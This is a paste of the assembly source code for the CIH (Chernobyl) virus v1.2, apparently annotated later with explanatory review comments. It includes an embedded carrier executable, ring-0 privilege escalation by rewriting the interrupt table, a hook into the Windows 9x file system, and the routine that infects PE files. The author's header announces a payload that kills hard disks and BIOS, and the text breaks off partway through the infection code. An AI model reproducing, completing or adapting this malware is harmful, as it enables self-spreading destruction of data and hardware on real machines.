crazykid_ceh

kid project

May 2nd, 2014
  1. ****************************************************************************
  2.  
  3. ; * The Virus Program Information *
  4. ;
  5. ****************************************************************************
  6.  
  7. ; *
  8. *
  9. ; * Designer : CIH Original Place : TTIT of Taiwan *
  10. ; * Create Date : 04/26/1998 Now Version : 1.2 *
  11. ; * Modification Time : 05/21/1998
  12. *
  13. ; * *
  14. ;
  15. *==========================================================================*
  16.  
  17. ; * Modification History *
  18. ;
  19. *==========================================================================*
  20.  
  21. ; * v1.0 1. Create the Virus Program. *
  22. ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
  23. ; * 04/26/1998 3. Virus Code doesn't Reload into System.
  24. *
  25. ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
  26. ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
  27. ; * 6. When System Opens Existing PE File, the File will be *
  28. ; * Infected, and the File doesn't be Reinfected.
  29. *
  30. ; * 7. It is also Infected, even the File is Read-Only. *
  31. ; * 8. When the File is Infected, the Modification Date and Time *
  32. ; * of the File also don't be Changed. *
  33. ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
  34. ; * Previous FileSystemApiHook, it will Call the Function *
  35. ; * that the IFS Manager Would Normally Call to Implement *
  36. ; * this Particular I/O Request. *
  37. ; * 10. The Virus Size is only 656 Bytes. *
  38. ;
  39. *==========================================================================*
  40.  
  41. ; * v1.1 1. Especially, the File that be Infected will not Increase *
  42. ; * it's Size... ^__^ *
  43. ; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
  44. ; * When Exception Error Occurs, Our OS System should be in *
  45. ; * Windows NT. So My Cute Virus will not Continue to Run, *
  46. ; * it will Jmup to Original Application to Run. *
  47. ; * 3. Use Better Algorithm, Reduce Virus Code Size. *
  48. ; * 4. The Virus "Basic" Size is only 796 Bytes. *
  49. ;
  50. *==========================================================================*
  51.  
  52. ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
  53. ; * 2. Modify the Bug of v1.1 *
  54. ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
  55. ;
  56. ****************************************************************************
  57.  
  58.  
  59. .586P
  60.  
  61. ;
  62. ****************************************************************************
  63.  
  64. ; * Original PE Executable File(Don't Modify this Section)
  65. *
  66. ;
  67. ****************************************************************************
  68.  
  69.  
OriginalAppEXE SEGMENT

; Carrier (first-generation host) image, emitted byte by byte. By file offset:
;   000h  MZ header; e_lfanew at 03Ch = 080h (the 080h in the eighth row)
;   040h  DOS stub ("This program cannot be run in DOS mode.")
;   080h  "PE\0\0", COFF header: Machine 014Ch, NumberOfSections 1,
;         SizeOfOptionalHeader 0E0h, Characteristics 010Fh
;   098h  optional header: Magic 010Bh, AddressOfEntryPoint 01010h,
;         BaseOfCode 01000h, ImageBase 00400000h, SectionAlignment 01000h,
;         FileAlignment 0200h
;   178h  single section ".text": VirtualSize 01000h, VirtualAddress 01000h,
;         SizeOfRawData 01000h, PointerToRawData 0200h, Characteristics 60000020h
;   200h  the host's entire code: one `ret` (0C3h) at RVA 01000h
;   208h  dd 0, VirusSize -- the two dwords that sit immediately before
;         MyVirusStart: [MyVirusStart-4] = size of the first code chunk,
;         [MyVirusStart-8] = 0 = end mark. The merge loop in MyVirusStart walks
;         this (address, size) table backwards.
; With VirusGame laid out directly after this segment, RVA 01010h (raw 0210h) is
; MyVirusStart, and the `push 00401000h / ret` that ends the ring-3 code returns
; to the host's lone `ret` at RVA 01000h.
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h ; host code: `ret`
dd 00000000h, VirusSize ; end mark, size of first chunk (read as [MyVirusStart-8], [MyVirusStart-4])

OriginalAppEXE ENDS
  141.  
  142. ;
  143. ****************************************************************************
  144.  
  145. ; * My Virus Game
  146. *
  147. ;
  148. ****************************************************************************
  149.  
  150.  
  151. ; *********************************************************
  152. ; * Constant Define *
  153. ; *********************************************************
  154.  
TRUE = 1
FALSE = 0
; NOTE(review): as pasted this is the DEBUG build. The IF DEBUG branches below
; pick int 5 instead of int 3 and BIOS drive 81h instead of 80h, and
; FileSystemApiHook additionally filters on the name tag 'FUCK' so that only
; deliberately named test files are touched.
DEBUG = TRUE
MajorVirusVersion = 1
MinorVirusVersion = 2
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ; 12h for v1.2 (major in the high nibble)

IF DEBUG
FirstKillHardDiskNumber = 81h ; first BIOS drive number for the payload (used beyond this excerpt)
HookExceptionNumber = 05h ; IDT vector whose gate is rewritten for the ring-3 -> ring-0 hop
ELSE
FirstKillHardDiskNumber = 80h
HookExceptionNumber = 03h
ENDIF

FileNameBufferSize = 7fh ; length limit handed to UniToBCSPath for the text after the "X:" prefix
  171. ; *********************************************************
  172. VirusGame SEGMENT
  173. ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
  174. ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
  175. ; *********************************************************
  176. ; * Ring3 Virus Game Initial Program *
  177. ; *********************************************************
MyVirusStart:
; Ring-3 entry: this is what NewAddressOfEntryPoint points at in an infected
; file. Every address is computed from the `call @0 / pop ebx` delta, so the
; routine is position independent; nothing may be moved without rechecking the
; @n-relative offsets used below and in the ring-0 part.
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
; Builds an SEH registration record on the stack: after the two pushes below
; [ESP] = previous fs:[0], [ESP+4] = StopToRunVirusCode, and fs:[0] = ESP.
; The record exists because the IDT write further down faults on NT; the
; handler then abandons the virus and runs the host instead.
lea eax, [esp-04h*2] ; address the two dwords will occupy
xor ebx, ebx
xchg eax, fs:[ebx] ; install; EAX = old head of the SEH chain
call @0
@0:
pop ebx ; EBX = runtime address of @0 (delta base)
lea ecx, StopToRunVirusCode-@0[ebx] ; ECX = handler address (also @1 below)
push ecx ; record.handler
push eax ; record.prev
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ; reserve a dword; SIDT below overwrites it
sidt [esp-02h] ; Get IDT Base Address -- 6-byte IDTR lands at ESP-2, so its 32-bit base sits at [ESP]
pop ebx ; EBX = IDT base
add ebx, HookExceptionNumber*08h+04h ; ZF = 0 -- EBX -> bytes 4..7 of the chosen gate; the ZF travels into the handler via the pushed EFLAGS
cli
mov ebp, [ebx] ; Get Exception Base -- upper half of EBP = offset[31:16] of the original handler
mov bp, [ebx-04h] ; Entry Point -- low word = offset[15:0]; EBP = original handler address, restored by ExitRing0Init
lea esi, MyExceptionHook-@1[ecx] ; ESI = linear address of MyExceptionHook
push esi
mov [ebx-04h], si ; gate offset[15:0] := MyExceptionHook
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; gate offset[31:16]
pop esi
; NOTE(review): these two stores are the privilege escalation: they succeed only
; where the IDT is writable from ring 3 (Windows 9x); elsewhere they fault and
; the SEH record above diverts execution to StopToRunVirusCode.
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException -- first pass into MyExceptionHook with ZF = 0
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
; On return EAX = address of MyVirusStart in this image and EDI = the system
; page allocated at ring 0. The (address, size) table that precedes
; MyVirusStart is walked backwards and every chunk is copied contiguously
; into the system page, reassembling the resident image.
push esi
mov esi, eax
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h] ; size of this chunk
rep movsb
sub eax, 08h
mov esi, [eax] ; address of the next chunk; 0 = end mark
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 -- this ZF is what the second int hands to the handler
jmp LoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Again -- ZF = 1: ring 0 installs the file-system hook
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
; Also the resume point when the virus is already resident: MyExceptionHook
; moves the first int's return EIP here, skipping the merge and second int.
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
; SEH handler. ESP is reloaded from the first dword of the record that fs:[0]
; points at, then the normal unlink path below runs.
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx] ; fs:[0] := saved previous record
pop eax ; discard the handler slot
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original -- the immediate is patched at infection time with ImageBase+AddressOfEntryPoint of the host
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
  266. ; *********************************************************
  267. ; * Ring0 Virus Game Initial Program *
  268. ; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
; Ring-0 entry, reached through the rewritten IDT gate. Contract with the
; ring-3 caller: EBX -> bytes 4..7 of the gate, EBP = original handler address,
; ESI = this routine's linear address, ECX = StopToRunVirusCode, and EFLAGS as
; at the `int` (ZF = 0 on the first int, ZF = 1 on the second).
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
; DR0 is used as a global "resident" flag (0 = not yet); later it holds the
; previous-hook pointer. A nonzero DR0 on an otherwise idle machine is therefore
; a cheap indicator of this code being active.
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException ; already resident: advance the pushed return EIP past the merge and second int
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ; gate offset := original handler again
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My Virus Exist in System -- any nonzero value will do
; Arguments for _PageAllocate, pushed right to left; ECX is 0 here. Read as the
; documented signature they would be nPages = 2, type 1, then zeros, -1, and
; flags 0Fh -- not verified against the VMM headers in this excerpt.
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate -- the VMM rewrites this int 20h + dword in place into a direct service call
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory Start Address -- copy destination for the ring-3 merge loop
lea eax, MyVirusStart-@2[esi] ; EAX = MyVirusStart in the current image -- copy source
iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
; Second int. Registers the hook that lives in the resident copy (EDI base;
; @6 is assigned beyond this excerpt), then redirects the install service
; itself so later installers are wrapped by InstallFileSystemApiHook.
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags
mov dr0, eax ; Save OldFileSystemApiHook Address -- prevhook later does `jmp [dr0]`
pop eax ; EAX = FileSystemApiHook Address

; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
; After the VMM patched the call above, the dword at the `dd` holds the address
; of the service's dispatch slot; ECX receives that slot address.
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx] ; EDX = real service entry
mov OldInstallFileSystemApiHook-@3[eax], edx ; stored inside the resident copy

; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax ; slot := resident InstallFileSystemApiHook

cli
jmp ExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
; Size of the ring-3 + ring-0 bootstrap above; the infection code requires at
; least this much slack after a victim's section table (see the `cmp cx, small`
; check in FileSystemApiHook).
CodeSizeOfMergeVirusCodeSection = offset $
  333. ; *********************************************************
  334. ; * IFSMgr_InstallFileSystemApiHook *
  335. ; *********************************************************
InstallFileSystemApiHook:
; Replacement for the IFSMgr_InstallFileSystemApiHook service (its dispatch
; slot was redirected here at ring-0 install time). The caller's hook pointer
; is at [ESP+8] once EBX is pushed. Sequence: remove the resident hook, let the
; real service link the caller's hook, then re-link the resident hook so that
; it sits in front of the newcomer, and return what the caller expected.
push ebx
call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-@4 ; EBX = resident FileSystemApiHook
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax

; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8] ; the caller's hook
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax ; keep the real service's return value for the caller

; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystemApiHook Address -- prevhook now chains to the caller's hook
pop eax
pop ebx
ret
; *********************************************************
; * Static Data *
; *********************************************************
OldInstallFileSystemApiHook dd ? ; real IFSMgr_InstallFileSystemApiHook entry, filled in by InstallMyFileSystemApiHook
  368. ; *********************************************************
  369. ; * IFSMgr_FileSystemHook *
  370. ; *********************************************************
  371.  
  372. ; *************************************
  373. ; * IFSMgr_FileSystemHook Entry Point *
  374. ; *************************************
FileSystemApiHook:
@3 = FileSystemApiHook
; IFSMgr file-system API hook (resident copy). Stack after PUSHAD, relative to
; ESP: +20h return address, +24h pIFSFunc, +28h function code, +2Ch drive,
; +38h pioreq (these are the offsets the code below reads). DR0 holds the
; pointer to the previous hook. The @6..@9 labels are assigned beyond this
; excerpt; from their use here @6 appears to be VirusGameDataStartAddress,
; @7 FileNameBuffer, @8 DataBuffer (per the original's own note) and
; @9 StartOfSectionTable.
pushad
call @5 ;
@5: ;
pop esi ; mov esi, offset VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-@5
; *************************************
; * Is OnBusy !? *
; *************************************
; Re-entrancy guard: the virus's own ring-0 file I/O re-enters this hook; such
; nested calls go straight to the real IFS function (pIFSFunc), skipping every
; other installed hook.
test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
jnz pIFSFunc ; goto pIFSFunc
; *************************************
; * Is OpenFile !? *
; *************************************
; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h] ; EBX -> function code
cmp dword ptr [ebx], 00000024h ; only file-open requests (24h) are examined
jne prevhook
; *************************************
; * Enable OnBusy *
; *************************************
inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
; mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6
push esi
mov al, [ebx+04h] ; drive number argument
cmp al, 0ffh ; 0FFh = no drive letter (presumably UNC): path only
je CallUniToBCSPath
add al, 40h ; 1 -> 'A', 3 -> 'C', ...
mov ah, ':'
mov [esi], eax ; stores 4 bytes; the two high bytes are expected to be overwritten by the path below
inc esi
inc esi
; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
; Arguments pushed right to left: charset 0, FileNameBufferSize, source
; (pioreq+0Ch, +4 -- looks like the ParsedPath inside the request; not verified
; here), destination = ESI. EAX on return is used as the resulting length.
CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h] ; EBX = pioreq
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h
; *************************************
; * Is FileName '.EXE' !? *
; *************************************
; Case-sensitive match on the last four bytes; lower-case ".exe" is skipped.
; cmp [esi+eax-04h], '.EXE'
cmp [esi+eax-04h], 'EXE.'
pop esi ; ESI = FileNameBuffer (with the "X:" prefix)
jne DisableOnBusy
IF DEBUG
; *************************************
; * Only for Debug *
; *************************************
; DEBUG build only: also requires the bytes at [length-6] to read "FUCK", so
; test runs touch only files named that way.
; cmp [esi+eax-06h], 'FUCK'
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy
ENDIF
; *************************************
; * Is Open Existing File !? *
; *************************************
; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h ; pioreq+18h == 1: open of an existing file (per the original's note)
jne DisableOnBusy
; *************************************
; * Get Attributes of the File *
; *************************************
; IFSMgr_Ring0_FileIO with AX = 4300h, ESI = path; ECX receives the attributes,
; CF set on failure. This first use goes through int 20h so the VMM resolves
; the service; its dispatch slot is then read back to obtain a direct entry.
mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h
jc DisableOnBusy
push ecx ; original attributes
; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] ; slot address written by the VMM patch
mov edi, [edi] ; EDI = service entry; every later file-I/O call is `call edi`
; *************************************
; * Is Read-Only File !? *
; *************************************
test cl, 01h
jz OpenFile
; *************************************
; * Modify Read-Only File to Write *
; *************************************
; Sets the attributes to 0 (clears read-only) so the open below can get write
; access; the original attributes are restored right after the open.
mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Open File *
; *************************************
; AX = 0D500h (open/create), ECX = 0, EDX = 1, EBX = 2, ESI = path. Under the
; ring-0 file-I/O convention these read as open-existing with read/write
; access -- not verified here. EAX returns the handle.
OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle
; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************
pop ecx ; original attributes
pushf ; preserve the open's CF across the attribute restore
test cl, 01h
jz IsOpenFileOK
; *************************************
; * Restore Attributes of the File *
; *************************************
mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Is Open File OK !? *
; *************************************
IsOpenFileOK:
popf
jc DisableOnBusy
; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************
; The pushed EFLAGS (CF = 0) is the "file not modified, no timestamp restore"
; marker consumed at CloseFile; the infection path replaces it with CF = 1.
push esi ; Push FileNameBuffer Address to Stack
pushf ; Now CF = 0, Push Flag to Stack
add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
; ***************************
; * Get OffsetToNewHeader *
; ***************************
; Read 4 bytes at file offset 3Ch (e_lfanew) into DataBuffer.
xor eax, eax
mov ah, 0d6h

; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax ; EBP = 0D600h (read) for all later reads
xor ecx, ecx
mov cl, 04h
xor edx, edx
mov dl, 3ch
call edi ; VXDCall IFSMgr_Ring0_FileIO
mov edx, [esi]
; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************
; Reads the byte just before the signature plus "PE\0". That byte is the
; infection mark: it is 0 in a clean file and is overwritten with a nonzero
; byte by the first write pushed in the infection code.
dec edx
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; cmp [esi], '\0PE\0'
cmp dword ptr [esi], 00455000h
jne CloseFile ; not PE, or already marked: close with CF = 0 (see CloseFile / IsKillComputer)
  556. ; *************************************
  557. ; * The File is ^o^ *
  558. ; * PE(Portable Executable) indeed. *
  559. ; *************************************
  560. ; * The File isn't also Infected. *
  561. ; *************************************
  562.  
  563. ; *************************************
  564. ; * Start to Infect the File *
  565. ; *************************************
  566. ; * Registers Use Status Now : *
  567. ; * *
  568. ; * EAX = 04h *
  569. ; * EBX = File Handle *
  570. ; * ECX = 04h *
  571. ; * EDX = 'PE\0\0' Signature of *
  572. ; * ImageFileHeader Pointer's *
  573. ; * Former Byte. *
  574. ; * ESI = DataBuffer Address ==> @8 *
  575. ; * EDI = IFSMgr_Ring0_FileIO Address *
  576. ; * EBP = D600h ==> Read Data in File *
  577. ; *************************************
  578. ; * Stack Dump : *
  579. ; * *
  580. ; * ESP => ------------------------- *
  581. ; * | EFLAG(CF=0) | *
  582. ; * ------------------------- *
  583. ; * | FileNameBufferPointer | *
  584. ; * ------------------------- *
  585. ; * | EDI | *
  586. ; * ------------------------- *
  587. ; * | ESI | *
  588. ; * ------------------------- *
  589. ; * | EBP | *
  590. ; * ------------------------- *
  591. ; * | ESP | *
  592. ; * ------------------------- *
  593. ; * | EBX | *
  594. ; * ------------------------- *
  595. ; * | EDX | *
  596. ; * ------------------------- *
  597. ; * | ECX | *
  598. ; * ------------------------- *
  599. ; * | EAX | *
  600. ; * ------------------------- *
  601. ; * | Return Address | *
  602. ; * ------------------------- *
  603. ; *************************************
; Infection proper. The stack is used as a work list of (size, file offset,
; buffer) triples, pushed buffer-last, terminated by the 0 pushed right after
; the handle; WriteVirusCodeToFile pops and writes them in reverse push order.
; DR1 remembers the ESP just above the first triple so OnlySetInfectedMark can
; discard everything but the mark write.
push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark
; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
; One byte at (PE signature - 1), taken from the first byte of the
; IFSMgr_Ring0_FileIO entry (EDI) -- any nonzero byte serves as the mark.
push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer
; ***************************
; * Save ESP Register *
; ***************************
mov dr1, esp
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
push eax ; Size -- EAX is still 4 here
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
; EDX moves from (signature - 1) to signature + 6 = NumberOfSections; the
; header is read from there, so DataBuffer[0] is NumberOfSections and the
; @8-relative field offsets apply both to the buffer (ESI) and to the file (EDX).
mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
; 12h = size of the COFF header from NumberOfSections onwards.
movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h]
; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************
mov al, SizeOfScetionTable
; I Assume NumberOfSections <= 0ffh
mov cl, (NumberOfSections-@8)[esi]
mul cl ; AX = NumberOfSections * sizeof(section header); upper EAX was already 0
; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
; Slack = SizeOfHeaders - (section table end + 8*(NumberOfSections+1)). The
; bootstrap (first chunk) must fit in that slack, which is why an infected
; file does not grow: the header padding and each section's raw/virtual size
; gap are the only places written.
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable
add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-@9)[esi]
jnc short OnlySetInfectedMark ; no slack at all
not ecx
inc ecx ; ECX = slack size
cmp cx, small CodeSizeOfMergeVirusCodeSection
jb OnlySetInfectedMark ; bootstrap would not fit: mark only, never retried
; ***************************
; * Save Original *
; * Address of Entry Point *
; ***************************
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table
mov eax, (AddressOfEntryPoint-@9)[esi]
add eax, (ImageBase-@9)[esi]
mov (OriginalAddressOfEntryPoint-@9)[esi], eax ; absolute VA, patched into the `push 00401000h` of the bootstrap
; ***************************
; * Read All Section Tables *
; ***************************
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, eax ; file offset just past the section table = where the table is written
push edx ; Pointer of File
add eax, esi ; same place inside DataBuffer = where the table is built
push eax ; Address of Buffer
; ***************************
